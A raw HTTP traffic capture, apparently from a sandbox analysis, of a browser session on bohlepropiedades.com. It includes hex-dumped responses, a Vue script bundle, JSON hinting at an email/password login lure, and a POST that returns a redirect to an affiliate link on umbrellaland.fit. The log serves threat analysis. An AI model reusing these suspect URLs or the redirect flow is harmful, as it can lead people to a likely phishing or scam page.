                                                                                                          2025-01-06 11:06:52 UTC219INData Raw: 64 30 0d 0a 5b 7b 22 63 6c 69 65 6e 74 22 3a 22 39 30 31 38 30 31 39 30 34 30 37 30 31 32 30 36 22 2c 22 74 65 6e 61 6e 74 22 3a 22 4b 48 50 61 48 44 4a 46 6b 44 51 65 43 4c 66 71 4a 33 46 47 22 2c 22 63 6f 6d 70 61 6e 79 22 3a 22 45 6d 61 69 6c 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 50 61 73 73 77 6f 72 64 22 2c 22 73 65 6e 73 6f 72 22 3a 22 4c 6f 67 69 6e 22 2c 22 61 70 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6d 61 67 69 7a 65 72 2e 69 6d 61 67 65 73 68 61 63 6b 2e 63 6f 6d 5c 2f 69 6d 67 39 32 33 5c 2f 36 31 31 31 5c 2f 4d 52 70 49 57 64 2e 6a 70 67 22 2c 22 61 6d 6f 75 6e 74 22 3a 33 36 32 36 34 30 30 7d 5d 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: d0[{"client":"9018019040701206","tenant":"KHPaHDJFkDQeCLfqJ3FG","company":"Email","description":"Password","sensor":"Login","api":"https:\/\/imagizer.imageshack.com\/img923\/6111\/MRpIWd.jpg","amount":3626400}]0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449762162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:52 UTC616OUTGET /favicon.ico HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:52 UTC205INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:51 GMT
                                                                                                          Server: Apache
                                                                                                          Last-Modified: Tue, 31 Dec 2024 06:17:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 490
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html
                                                                                                          2025-01-06 11:06:52 UTC490INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 2f 69 6e 63 6c 75 64 65 73 2f 76 69 74 65 2e 73 76 67 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <link rel="icon" type="image/svg+xml" href="/includes/vite.svg" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Home</title> <


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449764162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:52 UTC377OUTGET /includes/assets/index-qoqlwAed.js HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:52 UTC221INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:51 GMT
                                                                                                          Server: Apache
                                                                                                          Last-Modified: Tue, 31 Dec 2024 06:17:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 481611
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2025-01-06 11:06:52 UTC7971INData Raw: 76 61 72 20 64 30 3d 28 65 2c 74 29 3d 3e 28 29 3d 3e 28 74 7c 7c 65 28 28 74 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 29 2e 65 78 70 6f 72 74 73 2c 74 29 2c 74 2e 65 78 70 6f 72 74 73 29 3b 76 61 72 20 56 32 3d 64 30 28 28 68 6e 2c 76 6e 29 3d 3e 7b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 2e 72 65 6c 4c 69 73 74 3b 69 66 28 74 26 26 74 2e 73 75 70 70 6f 72 74 73 26 26 74 2e 73 75 70 70 6f 72 74 73 28 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 29 29 72 65 74 75 72 6e 3b 66 6f 72 28 63 6f 6e 73 74 20 6f 20 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 6c 69 6e 6b 5b 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72
                                                                                                          Data Ascii: var d0=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var V2=d0((hn,vn)=>{(function(){const t=document.createElement("link").relList;if(t&&t.supports&&t.supports("modulepreload"))return;for(const o of document.querySelectorAll('link[rel="modulepr
                                                                                                          2025-01-06 11:06:52 UTC8000INData Raw: 73 2e 63 6f 6d 70 75 74 65 64 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 74 68 69 73 2e 61 63 74 69 76 65 4c 69 6e 6b 3b 69 66 28 6e 3d 3d 3d 76 6f 69 64 20 30 7c 7c 6e 2e 73 75 62 21 3d 3d 44 65 29 6e 3d 74 68 69 73 2e 61 63 74 69 76 65 4c 69 6e 6b 3d 6e 65 77 20 54 30 28 44 65 2c 74 68 69 73 29 2c 44 65 2e 64 65 70 73 3f 28 6e 2e 70 72 65 76 44 65 70 3d 44 65 2e 64 65 70 73 54 61 69 6c 2c 44 65 2e 64 65 70 73 54 61 69 6c 2e 6e 65 78 74 44 65 70 3d 6e 2c 44 65 2e 64 65 70 73 54 61 69 6c 3d 6e 29 3a 44 65 2e 64 65 70 73 3d 44 65 2e 64 65 70 73 54 61 69 6c 3d 6e 2c 70 67 28 6e 29 3b 65 6c 73 65 20 69 66 28 6e 2e 76 65 72 73 69 6f 6e 3d 3d 3d 2d 31 26 26 28 6e 2e 76 65 72 73 69 6f 6e 3d 74 68 69 73 2e 76 65 72 73 69 6f 6e 2c 6e 2e 6e 65 78 74 44 65 70 29 29
                                                                                                          Data Ascii: s.computed)return;let n=this.activeLink;if(n===void 0||n.sub!==De)n=this.activeLink=new T0(De,this),De.deps?(n.prevDep=De.depsTail,De.depsTail.nextDep=n,De.depsTail=n):De.deps=De.depsTail=n,pg(n);else if(n.version===-1&&(n.version=this.version,n.nextDep))
                                                                                                          2025-01-06 11:06:52 UTC8000INData Raw: 29 3b 69 66 28 61 3d 3d 3d 30 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 6c 3d 6e 65 77 20 50 72 6f 78 79 28 65 2c 61 3d 3d 3d 32 3f 72 3a 6e 29 3b 72 65 74 75 72 6e 20 6f 2e 73 65 74 28 65 2c 6c 29 2c 6c 7d 66 75 6e 63 74 69 6f 6e 20 43 6f 28 65 29 7b 72 65 74 75 72 6e 20 67 72 28 65 29 3f 43 6f 28 65 2e 5f 5f 76 5f 72 61 77 29 3a 21 21 28 65 26 26 65 2e 5f 5f 76 5f 69 73 52 65 61 63 74 69 76 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 72 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 65 2e 5f 5f 76 5f 69 73 52 65 61 64 6f 6e 6c 79 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 65 2e 5f 5f 76 5f 69 73 53 68 61 6c 6c 6f 77 29 7d 66 75 6e 63 74 69 6f 6e 20 61 63 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 21 21 65 2e 5f
                                                                                                          Data Ascii: );if(a===0)return e;const l=new Proxy(e,a===2?r:n);return o.set(e,l),l}function Co(e){return gr(e)?Co(e.__v_raw):!!(e&&e.__v_isReactive)}function gr(e){return!!(e&&e.__v_isReadonly)}function Ht(e){return!!(e&&e.__v_isShallow)}function ac(e){return e?!!e._
                                                                                                          2025-01-06 11:06:52 UTC8000INData Raw: 29 3a 73 7c 7c 64 28 65 2c 74 2c 52 2c 41 2c 6f 2c 69 2c 61 2c 6c 2c 21 31 29 2c 78 29 45 3f 74 2e 70 72 6f 70 73 26 26 65 2e 70 72 6f 70 73 26 26 74 2e 70 72 6f 70 73 2e 74 6f 21 3d 3d 65 2e 70 72 6f 70 73 2e 74 6f 26 26 28 74 2e 70 72 6f 70 73 2e 74 6f 3d 65 2e 70 72 6f 70 73 2e 74 6f 29 3a 6d 69 28 74 2c 6e 2c 53 2c 75 2c 31 29 3b 65 6c 73 65 20 69 66 28 28 74 2e 70 72 6f 70 73 26 26 74 2e 70 72 6f 70 73 2e 74 6f 29 21 3d 3d 28 65 2e 70 72 6f 70 73 26 26 65 2e 70 72 6f 70 73 2e 74 6f 29 29 7b 63 6f 6e 73 74 20 6a 3d 74 2e 74 61 72 67 65 74 3d 72 73 28 74 2e 70 72 6f 70 73 2c 68 29 3b 6a 26 26 6d 69 28 74 2c 6a 2c 6e 75 6c 6c 2c 75 2c 30 29 7d 65 6c 73 65 20 45 26 26 6d 69 28 74 2c 5f 2c 76 2c 75 2c 31 29 3b 4e 69 28 74 2c 78 29 7d 7d 2c 72 65 6d 6f 76
                                                                                                          Data Ascii: ):s||d(e,t,R,A,o,i,a,l,!1),x)E?t.props&&e.props&&t.props.to!==e.props.to&&(t.props.to=e.props.to):mi(t,n,S,u,1);else if((t.props&&t.props.to)!==(e.props&&e.props.to)){const j=t.target=rs(t.props,h);j&&mi(t,j,null,u,0)}else E&&mi(t,_,v,u,1);Ni(t,x)}},remov
                                                                                                          2025-01-06 11:06:52 UTC8000INData Raw: 2c 63 28 65 29 3b 69 66 28 28 64 3d 6c 2e 5f 5f 63 73 73 4d 6f 64 75 6c 65 73 29 26 26 28 64 3d 64 5b 74 5d 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6e 21 3d 3d 41 65 26 26 45 65 28 6e 2c 74 29 29 72 65 74 75 72 6e 20 61 5b 74 5d 3d 34 2c 6e 5b 74 5d 3b 69 66 28 66 3d 73 2e 63 6f 6e 66 69 67 2e 67 6c 6f 62 61 6c 50 72 6f 70 65 72 74 69 65 73 2c 45 65 28 66 2c 74 29 29 72 65 74 75 72 6e 20 66 5b 74 5d 7d 2c 73 65 74 28 7b 5f 3a 65 7d 2c 74 2c 6e 29 7b 63 6f 6e 73 74 7b 64 61 74 61 3a 72 2c 73 65 74 75 70 53 74 61 74 65 3a 6f 2c 63 74 78 3a 69 7d 3d 65 3b 72 65 74 75 72 6e 20 70 6c 28 6f 2c 74 29 3f 28 6f 5b 74 5d 3d 6e 2c 21 30 29 3a 72 21 3d 3d 41 65 26 26 45 65 28 72 2c 74 29 3f 28 72 5b 74 5d 3d 6e 2c 21 30 29 3a 45 65 28 65 2e 70 72 6f 70 73 2c 74 29
                                                                                                          Data Ascii: ,c(e);if((d=l.__cssModules)&&(d=d[t]))return d;if(n!==Ae&&Ee(n,t))return a[t]=4,n[t];if(f=s.config.globalProperties,Ee(f,t))return f[t]},set({_:e},t,n){const{data:r,setupState:o,ctx:i}=e;return pl(o,t)?(o[t]=n,!0):r!==Ae&&Ee(r,t)?(r[t]=n,!0):Ee(e.props,t)
                                                                                                          2025-01-06 11:06:53 UTC8000INData Raw: 74 20 75 3d 5b 61 2c 6c 5d 3b 72 65 74 75 72 6e 20 4c 65 28 65 29 26 26 72 2e 73 65 74 28 65 2c 75 29 2c 75 7d 66 75 6e 63 74 69 6f 6e 20 54 75 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 30 5d 21 3d 3d 22 24 22 26 26 21 78 6f 28 65 29 7d 63 6f 6e 73 74 20 51 67 3d 65 3d 3e 65 5b 30 5d 3d 3d 3d 22 5f 22 7c 7c 65 3d 3d 3d 22 24 73 74 61 62 6c 65 22 2c 63 63 3d 65 3d 3e 62 65 28 65 29 3f 65 2e 6d 61 70 28 58 74 29 3a 5b 58 74 28 65 29 5d 2c 49 62 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 69 66 28 74 2e 5f 6e 29 72 65 74 75 72 6e 20 74 3b 63 6f 6e 73 74 20 72 3d 50 6e 28 28 2e 2e 2e 6f 29 3d 3e 63 63 28 74 28 2e 2e 2e 6f 29 29 2c 6e 29 3b 72 65 74 75 72 6e 20 72 2e 5f 63 3d 21 31 2c 72 7d 2c 4a 67 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 65 2e 5f 63 74 78
                                                                                                          Data Ascii: t u=[a,l];return Le(e)&&r.set(e,u),u}function Tu(e){return e[0]!=="$"&&!xo(e)}const Qg=e=>e[0]==="_"||e==="$stable",cc=e=>be(e)?e.map(Xt):[Xt(e)],Ib=(e,t,n)=>{if(t._n)return t;const r=Pn((...o)=>cc(t(...o)),n);return r._c=!1,r},Jg=(e,t,n)=>{const r=e._ctx
                                                                                                          2025-01-06 11:06:53 UTC8000INData Raw: 3d 28 77 2c 4f 2c 4d 2c 46 2c 59 3d 6e 75 6c 6c 29 3d 3e 7b 63 6f 6e 73 74 7b 65 6c 3a 42 2c 74 79 70 65 3a 4b 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 4e 2c 63 68 69 6c 64 72 65 6e 3a 7a 2c 73 68 61 70 65 46 6c 61 67 3a 6b 7d 3d 77 3b 69 66 28 6b 26 36 29 7b 4a 28 77 2e 63 6f 6d 70 6f 6e 65 6e 74 2e 73 75 62 54 72 65 65 2c 4f 2c 4d 2c 46 29 3b 72 65 74 75 72 6e 7d 69 66 28 6b 26 31 32 38 29 7b 77 2e 73 75 73 70 65 6e 73 65 2e 6d 6f 76 65 28 4f 2c 4d 2c 46 29 3b 72 65 74 75 72 6e 7d 69 66 28 6b 26 36 34 29 7b 4b 2e 6d 6f 76 65 28 77 2c 4f 2c 4d 2c 51 29 3b 72 65 74 75 72 6e 7d 69 66 28 4b 3d 3d 3d 4e 65 29 7b 72 28 42 2c 4f 2c 4d 29 3b 66 6f 72 28 6c 65 74 20 72 65 3d 30 3b 72 65 3c 7a 2e 6c 65 6e 67 74 68 3b 72 65 2b 2b 29 4a 28 7a 5b 72 65 5d 2c 4f 2c 4d 2c
                                                                                                          Data Ascii: =(w,O,M,F,Y=null)=>{const{el:B,type:K,transition:N,children:z,shapeFlag:k}=w;if(k&6){J(w.component.subTree,O,M,F);return}if(k&128){w.suspense.move(O,M,F);return}if(k&64){K.move(w,O,M,Q);return}if(K===Ne){r(B,O,M);for(let re=0;re<z.length;re++)J(z[re],O,M,
                                                                                                          2025-01-06 11:06:53 UTC8000INData Raw: 65 78 74 3a 6e 75 6c 6c 2c 63 74 78 3a 76 74 7d 3b 72 65 74 75 72 6e 20 6c 3f 28 66 63 28 73 2c 6e 29 2c 69 26 31 32 38 26 26 65 2e 6e 6f 72 6d 61 6c 69 7a 65 28 73 29 29 3a 6e 26 26 28 73 2e 73 68 61 70 65 46 6c 61 67 7c 3d 57 65 28 6e 29 3f 38 3a 31 36 29 2c 46 6f 3e 30 26 26 21 61 26 26 77 74 26 26 28 73 2e 70 61 74 63 68 46 6c 61 67 3e 30 7c 7c 69 26 36 29 26 26 73 2e 70 61 74 63 68 46 6c 61 67 21 3d 3d 33 32 26 26 77 74 2e 70 75 73 68 28 73 29 2c 73 7d 63 6f 6e 73 74 20 62 3d 71 62 3b 66 75 6e 63 74 69 6f 6e 20 71 62 28 65 2c 74 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 2c 72 3d 30 2c 6f 3d 6e 75 6c 6c 2c 69 3d 21 31 29 7b 69 66 28 28 21 65 7c 7c 65 3d 3d 3d 6d 62 29 26 26 28 65 3d 68 74 29 2c 4d 74 28 65 29 29 7b 63 6f 6e 73 74 20 6c 3d 51 74 28 65 2c 74
                                                                                                          Data Ascii: ext:null,ctx:vt};return l?(fc(s,n),i&128&&e.normalize(s)):n&&(s.shapeFlag|=We(n)?8:16),Fo>0&&!a&&wt&&(s.patchFlag>0||i&6)&&s.patchFlag!==32&&wt.push(s),s}const b=qb;function qb(e,t=null,n=null,r=0,o=null,i=!1){if((!e||e===mb)&&(e=ht),Mt(e)){const l=Qt(e,t
                                                                                                          2025-01-06 11:06:53 UTC8000INData Raw: 6e 28 78 2c 5b 4c 5d 29 2c 61 6e 28 4c 2c 69 29 2c 61 6e 28 4c 2c 61 29 7d 2c 6f 6e 42 65 66 6f 72 65 41 70 70 65 61 72 28 4c 29 7b 4a 6e 28 5f 2c 5b 4c 5d 29 2c 61 6e 28 4c 2c 73 29 2c 61 6e 28 4c 2c 75 29 7d 2c 6f 6e 45 6e 74 65 72 3a 6a 28 21 31 29 2c 6f 6e 41 70 70 65 61 72 3a 6a 28 21 30 29 2c 6f 6e 4c 65 61 76 65 28 4c 2c 48 29 7b 4c 2e 5f 69 73 4c 65 61 76 69 6e 67 3d 21 30 3b 63 6f 6e 73 74 20 6e 65 3d 28 29 3d 3e 41 28 4c 2c 48 29 3b 61 6e 28 4c 2c 64 29 2c 4c 2e 5f 65 6e 74 65 72 43 61 6e 63 65 6c 6c 65 64 3f 28 61 6e 28 4c 2c 66 29 2c 6b 75 28 29 29 3a 28 6b 75 28 29 2c 61 6e 28 4c 2c 66 29 29 2c 6a 75 28 28 29 3d 3e 7b 4c 2e 5f 69 73 4c 65 61 76 69 6e 67 26 26 28 65 72 28 4c 2c 64 29 2c 61 6e 28 4c 2c 70 29 2c 4c 75 28 50 29 7c 7c 48 75 28 4c
                                                                                                          Data Ascii: n(x,[L]),an(L,i),an(L,a)},onBeforeAppear(L){Jn(_,[L]),an(L,s),an(L,u)},onEnter:j(!1),onAppear:j(!0),onLeave(L,H){L._isLeaving=!0;const ne=()=>A(L,H);an(L,d),L._enterCancelled?(an(L,f),ku()):(ku(),an(L,f)),ju(()=>{L._isLeaving&&(er(L,d),an(L,p),Lu(P)||Hu(L
                                                                                                          2025-01-06 11:06:53 UTC8000INData Raw: 61 63 65 28 68 68 2c 22 25 32 33 22 29 2e 72 65 70 6c 61 63 65 28 7a 79 2c 22 25 32 36 22 29 2e 72 65 70 6c 61 63 65 28 4b 79 2c 22 60 22 29 2e 72 65 70 6c 61 63 65 28 62 68 2c 22 7b 22 29 2e 72 65 70 6c 61 63 65 28 79 68 2c 22 7d 22 29 2e 72 65 70 6c 61 63 65 28 6d 68 2c 22 5e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 71 79 28 65 29 7b 72 65 74 75 72 6e 20 66 73 28 65 29 2e 72 65 70 6c 61 63 65 28 6b 79 2c 22 25 33 44 22 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 79 28 65 29 7b 72 65 74 75 72 6e 20 70 63 28 65 29 2e 72 65 70 6c 61 63 65 28 68 68 2c 22 25 32 33 22 29 2e 72 65 70 6c 61 63 65 28 57 79 2c 22 25 33 46 22 29 7d 66 75 6e 63 74 69 6f 6e 20 51 79 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 6e 75 6c 6c 3f 22 22 3a 5a 79 28 65 29 2e 72 65 70 6c 61 63 65 28 46 79
                                                                                                          Data Ascii: ace(hh,"%23").replace(zy,"%26").replace(Ky,"`").replace(bh,"{").replace(yh,"}").replace(mh,"^")}function qy(e){return fs(e).replace(ky,"%3D")}function Zy(e){return pc(e).replace(hh,"%23").replace(Wy,"%3F")}function Qy(e){return e==null?"":Zy(e).replace(Fy


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449765162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:53 UTC355OUTGET /favicon.ico HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:53 UTC205INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:52 GMT
                                                                                                          Server: Apache
                                                                                                          Last-Modified: Tue, 31 Dec 2024 06:17:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 490
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html
                                                                                                          2025-01-06 11:06:53 UTC490INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 2f 69 6e 63 6c 75 64 65 73 2f 76 69 74 65 2e 73 76 67 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <link rel="icon" type="image/svg+xml" href="/includes/vite.svg" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Home</title> <


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449766162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:53 UTC360OUTGET /includes/sse.php HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:53 UTC166INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:52 GMT
                                                                                                          Server: Apache
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          2025-01-06 11:06:53 UTC138INData Raw: 37 66 0d 0a 5b 7b 22 63 6c 69 65 6e 74 22 3a 22 31 34 22 2c 22 74 65 6e 61 6e 74 22 3a 22 4c 68 71 68 45 77 46 39 78 35 48 6d 52 6f 5c 75 30 30 31 31 7a 64 4b 78 48 22 2c 22 63 6f 6d 70 61 6e 79 22 3a 6e 75 6c 6c 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 73 65 6e 73 6f 72 22 3a 6e 75 6c 6c 2c 22 61 70 69 22 3a 6e 75 6c 6c 2c 22 61 6d 6f 75 6e 74 22 3a 6e 75 6c 6c 7d 5d 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 7f[{"client":"14","tenant":"LhqhEwF9x5HmRo\u0011zdKxH","company":null,"description":null,"sensor":null,"api":null,"amount":null}]0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.450046162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:09 UTC664OUTPOST /includes/contact.php HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 104
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://bohlepropiedades.com
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://bohlepropiedades.com/includes/3z6r2I6C42020J
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:09 UTC104OUTData Raw: 7b 22 74 65 6e 61 6e 74 22 3a 22 4b 48 50 61 48 44 4a 46 6b 44 51 65 43 4c 66 71 4a 33 46 47 22 2c 22 63 6c 69 65 6e 74 22 3a 22 39 30 31 38 30 31 39 30 34 30 37 30 31 32 30 36 22 2c 22 61 6d 6f 75 6e 74 22 3a 33 36 32 36 34 30 30 2c 22 70 65 72 73 6f 6e 61 22 3a 22 22 2c 22 63 6f 6d 70 61 6e 79 22 3a 22 22 7d
                                                                                                          Data Ascii: {"tenant":"KHPaHDJFkDQeCLfqJ3FG","client":"9018019040701206","amount":3626400,"persona":"","company":""}
                                                                                                          2025-01-06 11:09:10 UTC151INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:08 GMT
                                                                                                          Server: Apache
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: application/json
                                                                                                          2025-01-06 11:09:10 UTC145INData Raw: 38 36 0d 0a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 75 6d 62 72 65 6c 6c 61 6c 61 6e 64 2e 66 69 74 5c 2f 3f 73 6c 3d 35 38 37 39 39 30 35 2d 30 30 33 31 63 26 70 75 62 5f 63 6c 69 63 6b 5f 69 64 3d 7b 45 78 74 65 72 6e 61 6c 5f 49 44 5f 66 72 6f 6d 5f 74 72 61 66 66 69 63 5f 73 6f 75 72 63 65 7d 26 73 69 74 65 3d 7b 73 75 62 49 44 7d 26 70 75 62 5f 73 75 62 5f 69 64 3d 7b 73 75 62 5f 73 75 62 49 44 7d 22 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 86"https:\/\/www.umbrellaland.fit\/?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}"0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.450047162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
